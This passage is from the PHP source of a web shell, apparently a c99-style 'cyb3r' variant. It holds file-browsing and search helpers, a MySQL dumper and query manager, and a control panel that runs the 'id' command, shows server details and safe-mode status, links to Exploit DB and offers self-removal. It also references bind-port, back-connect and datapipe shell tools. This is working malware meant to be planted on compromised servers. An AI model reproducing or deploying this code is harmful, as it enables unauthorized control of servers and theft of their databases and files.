1051if (!function_exists("parse_perms"))
1052
1053{
1054
1055function parse_perms($mode)
1056
1057{
1058
1059 if (($mode & 0xC000) === 0xC000) {$t = "s";}
1060
1061 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
1062
1063 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
1064
1065 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
1066
1067 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
1068
1069 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
1070
1071 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
1072
1073 else {$t = "?";}
1074
1075 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
1076
1077 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
1078
1079 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
1080
1081 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
1082
1083}
1084
1085}
1086
1087if (!function_exists("parsesort"))
1088
1089{
1090
1091function parsesort($sort)
1092
1093{
1094
1095 $one = intval($sort);
1096
1097 $second = substr($sort,-1);
1098
1099 if ($second != "d") {$second = "a";}
1100
1101 return array($one,$second);
1102
1103}
1104
1105}
1106
1107if (!function_exists("view_perms_color"))
1108
1109{
1110
1111function view_perms_color($o)
1112
1113{
1114
1115 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
1116
1117 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
1118
1119 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
1120
1121}
1122
1123}
1124
1125if (!function_exists("cyb3rgetsource"))
1126
1127{
1128
1129function cyb3rgetsource($fn)
1130
1131{
1132
1133 global $cyb3r_sourcesurl;
1134
1135 $array = array(
1136
1137 "cyb3r_bindport.pl" => "cyb3r_bindport_pl.txt",
1138
1139 "cyb3r_bindport.c" => "cyb3r_bindport_c.txt",
1140
1141 "cyb3r_backconn.pl" => "cyb3r_backconn_pl.txt",
1142
1143 "cyb3r_backconn.c" => "cyb3r_backconn_c.txt",
1144
1145 "cyb3r_datapipe.pl" => "cyb3r_datapipe_pl.txt",
1146
1147 "cyb3r_datapipe.c" => "cyb3r_datapipe_c.txt",
1148
1149 );
1150
1151}
1152
1153}
1154
1155if (!function_exists("mysql_dump"))
1156
1157{
1158
1159function mysql_dump($set)
1160
1161{
1162
1163 global $shver;
1164
1165 $sock = $set["sock"];
1166
1167 $db = $set["db"];
1168
1169 $print = $set["print"];
1170
1171 $nl2br = $set["nl2br"];
1172
1173 $file = $set["file"];
1174
1175 $add_drop = $set["add_drop"];
1176
1177 $tabs = $set["tabs"];
1178
1179 $onlytabs = $set["onlytabs"];
1180
1181 $ret = array();
1182
1183 $ret["err"] = array();
1184
1185 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
1186
1187 if (empty($db)) {$db = "db";}
1188
1189 if (empty($print)) {$print = 0;}
1190
1191 if (empty($nl2br)) {$nl2br = 0;}
1192
1193 if (empty($add_drop)) {$add_drop = TRUE;}
1194
1195 if (empty($file))
1196
1197 {
1198
1199 $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
1200
1201 }
1202
1203 if (!is_array($tabs)) {$tabs = array();}
1204
1205 if (empty($add_drop)) {$add_drop = TRUE;}
1206
1207 if (sizeof($tabs) == 0)
1208
1209 {
1210
1211 // retrive tables-list
1212
1213 $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
1214
1215 if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
1216
1217 }
1218
1219 $out = "# Dumped by cyb3rell.SQL v. ".$shver."
1220
1221# Home page: http://ccteam.ru
1222
1223#
1224
1225# Host settings:
1226
1227# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
1228
1229# Date: ".date("d.m.Y H:i:s")."
1230
1231# DB: \"".$db."\"
1232
1233#---------------------------------------------------------
1234
1235";
1236
1237 $c = count($onlytabs);
1238
1239 foreach($tabs as $tab)
1240
1241 {
1242
1243 if ((in_array($tab,$onlytabs)) or (!$c))
1244
1245 {
1246
1247 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
1248
1249 // recieve query for create table structure
1250
1251 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
1252
1253 if (!$res) {$ret["err"][] = mysql_smarterror();}
1254
1255 else
1256
1257 {
1258
1259 $row = mysql_fetch_row($res);
1260
1261 $out .= $row["1"].";\n\n";
1262
1263 // recieve table variables
1264
1265 $res = mysql_query("SELECT * FROM `$tab`", $sock);
1266
1267 if (mysql_num_rows($res) > 0)
1268
1269 {
1270
1271 while ($row = mysql_fetch_assoc($res))
1272
1273 {
1274
1275 $keys = implode("`, `", array_keys($row));
1276
1277 $values = array_values($row);
1278
1279 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
1280
1281 $values = implode("', '", $values);
1282
1283 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
1284
1285 $out .= $sql;
1286
1287 }
1288
1289 }
1290
1291 }
1292
1293 }
1294
1295 }
1296
1297 $out .= "#---------------------------------------------------------------------------------\n\n";
1298
1299 if ($file)
1300
1301 {
1302
1303 $fp = fopen($file, "w");
1304
1305 if (!$fp) {$ret["err"][] = 2;}
1306
1307 else
1308
1309 {
1310
1311 fwrite ($fp, $out);
1312
1313 fclose ($fp);
1314
1315 }
1316
1317 }
1318
1319 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
1320
1321 return $out;
1322
1323}
1324
1325}
1326
1327if (!function_exists("mysql_buildwhere"))
1328
1329{
1330
1331function mysql_buildwhere($array,$sep=" and",$functs=array())
1332
1333{
1334
1335 if (!is_array($array)) {$array = array();}
1336
1337 $result = "";
1338
1339 foreach($array as $k=>$v)
1340
1341 {
1342
1343 $value = "";
1344
1345 if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
1346
1347 $value .= "'".addslashes($v)."'";
1348
1349 if (!empty($functs[$k])) {$value .= ")";}
1350
1351 $result .= "`".$k."` = ".$value.$sep;
1352
1353 }
1354
1355 $result = substr($result,0,strlen($result)-strlen($sep));
1356
1357 return $result;
1358
1359}
1360
1361}
1362
1363if (!function_exists("mysql_fetch_all"))
1364
1365{
1366
1367function mysql_fetch_all($query,$sock)
1368
1369{
1370
1371 if ($sock) {$result = mysql_query($query,$sock);}
1372
1373 else {$result = mysql_query($query);}
1374
1375 $array = array();
1376
1377 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
1378
1379 mysql_free_result($result);
1380
1381 return $array;
1382
1383}
1384
1385}
1386
1387if (!function_exists("mysql_smarterror"))
1388
1389{
1390
1391function mysql_smarterror($type,$sock)
1392
1393{
1394
1395 if ($sock) {$error = mysql_error($sock);}
1396
1397 else {$error = mysql_error();}
1398
1399 $error = htmlspecialchars($error);
1400
1401 return $error;
1402
1403}
1404
1405}
1406
1407if (!function_exists("mysql_query_form"))
1408
1409{
1410
1411function mysql_query_form()
1412
1413{
1414
1415 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
1416
1417 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
1418
1419 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
1420
1421 if ((!$submit) or ($sql_act))
1422
1423 {
1424
1425 echo "<table border=0><tr><td><form name=\"cyb3r_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
1426
1427 if ($tbl_struct)
1428
1429 {
1430
1431 echo "<td valign=\"top\"><b>Fields:</b><br>";
1432
1433 foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.cyb3r_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
1434
1435 echo "</td></tr></table>";
1436
1437 }
1438
1439 }
1440
1441 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
1442
1443}
1444
1445}
1446
1447if (!function_exists("mysql_create_db"))
1448
1449{
1450
1451function mysql_create_db($db,$sock="")
1452
1453{
1454
1455 $sql = "CREATE DATABASE `".addslashes($db)."`;";
1456
1457 if ($sock) {return mysql_query($sql,$sock);}
1458
1459 else {return mysql_query($sql);}
1460
1461}
1462
1463}
1464
1465if (!function_exists("mysql_query_parse"))
1466
1467{
1468
1469function mysql_query_parse($query)
1470
1471{
1472
1473 $query = trim($query);
1474
1475 $arr = explode (" ",$query);
1476
1477 /*array array()
1478
1479 {
1480
1481 "METHOD"=>array(output_type),
1482
1483 "METHOD1"...
1484
1485 ...
1486
1487 }
1488
1489 if output_type == 0, no output,
1490
1491 if output_type == 1, no output if no error
1492
1493 if output_type == 2, output without control-buttons
1494
1495 if output_type == 3, output with control-buttons
1496
1497 */
1498
1499 $types = array(
1500
1501 "SELECT"=>array(3,1),
1502
1503 "SHOW"=>array(2,1),
1504
1505 "DELETE"=>array(1),
1506
1507 "DROP"=>array(1)
1508
1509 );
1510
1511 $result = array();
1512
1513 $op = strtoupper($arr[0]);
1514
1515 if (is_array($types[$op]))
1516
1517 {
1518
1519 $result["propertions"] = $types[$op];
1520
1521 $result["query"] = $query;
1522
1523 if ($types[$op] == 2)
1524
1525 {
1526
1527 foreach($arr as $k=>$v)
1528
1529 {
1530
1531 if (strtoupper($v) == "LIMIT")
1532
1533 {
1534
1535 $result["limit"] = $arr[$k+1];
1536
1537 $result["limit"] = explode(",",$result["limit"]);
1538
1539 if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
1540
1541 unset($arr[$k],$arr[$k+1]);
1542
1543 }
1544
1545 }
1546
1547 }
1548
1549 }
1550
1551 else {return FALSE;}
1552
1553}
1554
1555}
1556
1557if (!function_exists("cyb3rfsearch"))
1558
1559{
1560
1561function cyb3rfsearch($d)
1562
1563{
1564
1565 global $found;
1566
1567 global $found_d;
1568
1569 global $found_f;
1570
1571 global $search_i_f;
1572
1573 global $search_i_d;
1574
1575 global $a;
1576
1577 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
1578
1579 $h = opendir($d);
1580
1581 while (($f = readdir($h)) !== FALSE)
1582
1583 {
1584
1585 if($f != "." && $f != "..")
1586
1587 {
1588
1589 $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
1590
1591 if (is_dir($d.$f))
1592
1593 {
1594
1595 $search_i_d++;
1596
1597 if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
1598
1599 if (!is_link($d.$f)) {cyb3rfsearch($d.$f);}
1600
1601 }
1602
1603 else
1604
1605 {
1606
1607 $search_i_f++;
1608
1609 if ($bool)
1610
1611 {
1612
1613 if (!empty($a["text"]))
1614
1615 {
1616
1617 $r = @file_get_contents($d.$f);
1618
1619 if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
1620
1621 if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
1622
1623 if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
1624
1625 else {$bool = strpos(" ".$r,$a["text"],1);}
1626
1627 if ($a["text_not"]) {$bool = !$bool;}
1628
1629 if ($bool) {$found[] = $d.$f; $found_f++;}
1630
1631 }
1632
1633 else {$found[] = $d.$f; $found_f++;}
1634
1635 }
1636
1637 }
1638
1639 }
1640
1641 }
1642
1643 closedir($h);
1644
1645}
1646
1647}
1648
1649if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
1650
1651//Sending headers
1652
1653@ob_start();
1654
1655@ob_implicit_flush(0);
1656
1657function onphpshutdown()
1658
1659{
1660
1661 global $gzipencode,$ft;
1662
1663 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
1664
1665 {
1666
1667 $v = @ob_get_contents();
1668
1669 @ob_end_clean();
1670
1671 @ob_start("ob_gzHandler");
1672
1673 echo $v;
1674
1675 @ob_end_flush();
1676
1677 }
1678
1679}
1680
1681function cyb3rexit()
1682
1683{
1684
1685 onphpshutdown();
1686
1687 exit;
1688
1689}
1690
1691
1692if (empty($tmpdir))
1693
1694{
1695
1696 $tmpdir = ini_get("upload_tmp_dir");
1697
1698 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
1699
1700}
1701
1702$tmpdir = realpath($tmpdir);
1703
1704$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
1705
1706if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
1707
1708if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
1709
1710else {$tmpdir_logs = realpath($tmpdir_logs);}
1711
1712if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
1713
1714{
1715
1716 $safemode = TRUE;
1717
1718 $hsafemode = "<font color=green>ON (secure)</font>";
1719 $sfmode = "<font color=green><b>ON (secure)</b></font>";
1720}
1721
1722else {$safemode = FALSE; $hsafemode = "<font color=red>OFF (not secure)</font>"; $sfmode = "<font color=red><b>OFF (not secure)</b></font>";}
1723
1724$v = @ini_get("open_basedir");
1725
1726if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
1727
1728else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
1729
1730$sort = htmlspecialchars($sort);
1731
1732if (empty($sort)) {$sort = $sort_default;}
1733
1734$sort[1] = strtolower($sort[1]);
1735
1736$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
1737
1738if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
1739
1740$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),'[<a href="http://www.google.com/search?q='.$kernel.' '. $release.'" target=_blank ><b><u><font color="red">Google</font></u></b></a>]',htmlspecialchars($DISP_SERVER_SOFTWARE));
1741
1742@ini_set("highlight.bg",$highlight_bg); //FFFFFF
1743
1744@ini_set("highlight.comment",$highlight_comment); //#FF8000
1745
1746@ini_set("highlight.default",$highlight_default); //#0000BB
1747
1748@ini_set("highlight.html",$highlight_html); //#000000
1749
1750@ini_set("highlight.keyword",$highlight_keyword); //#007700
1751
1752@ini_set("highlight.string",$highlight_string); //#DD0000
1753
1754if (!is_array($actbox)) {$actbox = array();}
1755
1756$dspact = $act = htmlspecialchars($act);
1757
1758$disp_fullpath = $ls_arr = $notls = null;
1759
1760$ud = urlencode($d);
1761
1762?>
1763
1764<center>
1765<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
1766<tr>
1767<td><center><p><a href="?"><img src="http://s15.postimage.org/5oskuq363/image.png" height="68px" width="66px" border="0px"/></a><br />cyb3r.9l4di4t0r<br /><?php echo $shver; ?> </p></center></td>
1768<td width="90%">
1769<TABLE style="BORDER-COLLAPSE: collapse" borderColorDark=#c0c0c0 cellPadding=3 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0>
1770 <tr>
1771 <td width="9%" ><b>Software :</b></td>
1772 <td ><b><?php echo $DISP_SERVER_SOFTWARE.' [<a href="'.$expltlink.'" target=_blank><b><u><font color="yellow">Exploit DB</font></u></b></a>]'; ?></b></td>
1773 <td width="9%"><?php echo "<a href=\"".$surl."act=serverinfo\" ><b><u>Server</u> I.P.</b></a>"?></td>
1774 <td width="9%"><b><?php echo getenv('SERVER_ADDR'); ?></b></td>
1775 </tr>
1776 <tr>
1777 <td width="9%" ><?php echo "<a href=\"".$surl."act=security\" ><b><u>Uname-a</u> :</b></a>"?></td>
1778 <td ><b><?php echo wordwrap(php_uname(),90,"<br>",1); ?></b></td>
1779 <td width="9%"><?php echo "<a href=\"".$surl."act=clientinfo\" ><b><u>Client</u> I.P.</b></a>"?></td>
1780 <td width="9%"><b><?php echo $_SERVER['REMOTE_ADDR']; ?></b></td>
1781 </tr>
1782 <tr>
1783 <td width="9%" ><?php echo "<a href=\"".$surl."act=processes\" ><b><u>Username</u> :</b></a>"?></td>
1784 <td ><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b></td>
1785 <td width="9%"><?php echo "<a href=\"".$surl."act=systeminfo\" ><b><u>Sys</u>tem<u>info</u></b></a>"?></td>
1786 <td width="9%"></td>
1787 </tr>
1788 <tr>
1789 <td width="9%" ><b>Safe Mode :</b></td>
1790 <td ><b><?php echo $hsafemode; ?></b></td>
1791 <td width="9%"><b></b></td>
1792 <td width="9%"></td>
1793 </tr>
1794 <tr>
1795 <td width="9%" ><b>Directory :</b></td>
1796 <td ><b>
1797 <?php
1798
1799$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
1800
1801if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
1802
1803$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
1804
1805if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
1806
1807$d = str_replace("\\\\","\\",$d);
1808
1809$dispd = htmlspecialchars($d);
1810
1811$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
1812
1813$i = 0;
1814
1815foreach($pd as $b)
1816
1817{
1818
1819 $t = "";
1820
1821 $j = 0;
1822
1823 foreach ($e as $r)
1824
1825 {
1826
1827 $t.= $r.DIRECTORY_SEPARATOR;
1828
1829 if ($j == $i) {break;}
1830
1831 $j++;
1832
1833 }
1834
1835 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
1836
1837 $i++;
1838
1839}
1840
1841echo "&nbsp;&nbsp;&nbsp;";
1842
1843if (is_writable($d))
1844
1845{
1846
1847 $wd = TRUE;
1848
1849 $wdt = "<font color=green>[ ok ]</font>";
1850
1851 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
1852
1853}
1854
1855else
1856
1857{
1858
1859 $wd = FALSE;
1860
1861 $wdt = "<font color=red>[ Read-Only ]</font>";
1862
1863 echo "<b>".view_perms_color($d)."</b>";
1864
1865}
1866 ?>
1867 </b></td>
1868 <td width="9%"><?php echo "<a href=\"".$surl."act=selfremove\" ><b><font color='orange'>Self <u>Remove</u></font></b></a>"?></td>
1869 <td width="9%"></td>
1870 </tr>
1871 <tr>
1872 <td width="9%" ><b>Free Space :</b></td>
1873 <td ><b>
1874 <?php if (is_callable("disk_free_space"))
1875
1876{
1877
1878 $free = disk_free_space($d);
1879
1880 $total = disk_total_space($d);
1881
1882 if ($free === FALSE) {$free = 0;}
1883
1884 if ($total === FALSE) {$total = 0;}
1885
1886 if ($free < 0) {$free = 0;}
1887
1888 if ($total < 0) {$total = 0;}
1889
1890 $used = $total-$free;
1891
1892 $free_percent = round(100/($total/$free),2);
1893
1894 echo "<b>".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
1895
1896}?>
1897 </b></td>
1898 <td width="9%"><?php echo "<a href=\"".$surl."act=feedback\" ><b>Feed<u>back</u></b></a>"?></td>
1899 <td width="9%"></td>
1900 </tr>
1901 <tr>
1902 <td width="9%" ><b>Drives :</b></td>
1903 <td ><b>
1904 <?php $letters = "";
1905
1906if ($win)
1907
1908{
1909
1910 $v = explode("\\",$d);
1911
1912 $v = $v[0];
1913
1914 foreach (range("a","z") as $letter)
1915
1916 {
1917
1918 $bool = $isdiskette = in_array($letter,$safemode_diskettes);
1919
1920 if (!$bool) {$bool = is_dir($letter.":\\");}
1921
1922 if ($bool)
1923
1924 {
1925
1926 $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
1927
1928 if ($letter.":" != $v) {$letters .= $letter;}
1929
1930 else {$letters .= "<font color=green>".$letter."</font>";}
1931
1932 $letters .= " ]</a> ";
1933
1934 }
1935
1936 }
1937
1938 if (!empty($letters)) {echo $letters."<br>";}
1939}
1940 ?></b></td>
1941 <td width="9%"><a href="<?php echo $self.'?logout'?>"><b><font color='green'>I'm <u>Out</u> !</font></b></a></td>
1942 <td width="9%"></td>
1943 </tr>
1944
1945 </table>
1946</td>
1947
1948</tr>
1949</table>
1950
1951<TABLE style="BORDER-COLLAPSE: collapse" height="1" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1>
1952<tr><td width="100%" valign="top">
1953 ADMIN: <?php echo $_SERVER['SERVER_ADMIN'];?> <font color="silver">|</font>
1954 PHP : <?php echo "<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>".$phpVersion."</u></b></a>"?> <font color="silver">|</font>
1955 Curl : <?php echo function_exists('curl_version')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
1956 Oracle : <?php echo function_exists('ocilogon')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
1957 MySQL : <?php echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");?> <font color="silver">|</font>
1958 MSSQL : <?php echo function_exists('mssql_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
1959 PostgreSQL : <?php echo function_exists('pg_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
1960 Disable functions : <?php getDisabledFunctions(); ?>
1961 </td></tr>
1962</table>
1963
1964<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
1965<tr><td width="100%" valign="top">
1966 <?php
1967 if (count($quicklaunch) > 0)
1968
1969 {
1970
1971 foreach($quicklaunch as $item)
1972
1973 {
1974
1975 $item[1] = str_replace("%d",urlencode($d),$item[1]);
1976
1977 $item[1] = str_replace("%sort",$sort,$item[1]);
1978
1979 $v = realpath($d."..");
1980
1981 if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
1982
1983 $item[1] = str_replace("%upd",urlencode($v),$item[1]);
1984
1985 echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
1986
1987 }
1988
1989 }?>
1990 </td>
1991 </tr>
1992 </table><br>
1993<?php
1994
1995if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
1996
1997echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
1998
1999if ($act == "") {$act = $dspact = "ls";}
2000
2001if ($act == "sql")
2002
2003{
2004
2005 $sql_surl = $surl."act=sql";
2006
2007 if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
2008
2009 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
2010
2011 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
2012
2013 if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
2014
2015 if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
2016
2017 $sql_surl .= "&";
2018
2019 ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3>
2020 <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
2021
2022 if ($sql_server)
2023
2024 {
2025
2026 $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
2027
2028 $err = mysql_smarterror();
2029
2030 @mysql_select_db($sql_db,$sql_sock);
2031
2032 if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
2033
2034 }
2035
2036 else {$sql_sock = FALSE;}
2037
2038 echo "<b>SQL Manager:</b><br>";
2039
2040 if (!$sql_sock)
2041
2042 {
2043
2044 if (!$sql_server) {echo "NO CONNECTION";}
2045
2046 else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
2047
2048 }
2049
2050 else
2051
2052 {
2053
2054 $sqlquicklaunch = array();
2055
2056 $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
2057
2058 $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
2059
2060 $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
2061
2062 $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
2063
2064 $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
2065
2066 $sqlquicklaunch[] = array("Logout",$surl."act=sql");
2067
2068 echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
2069
2070 if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
2071
2072 echo "</center>";
2073
2074 }
2075
2076 echo "</td></tr><tr>";
2077
2078 if (!$sql_sock) {?>
2079 <td width="28%" height="100" valign="top"><center><font size="5"> i </font></center>
2080 <li>If login is null, login is owner of process.<li>
2081 If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table>
2082 </td>
2083 <?php }
2084
2085 else
2086{
2087
2088 //Start left panel
2089
2090 if (!empty($sql_db))
2091 {
2092
2093 ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
2094
2095 $result = mysql_list_tables($sql_db);
2096
2097 if (!$result) {echo mysql_smarterror();}
2098
2099 else
2100
2101 {
2102
2103 echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
2104
2105 $c = 0;
2106
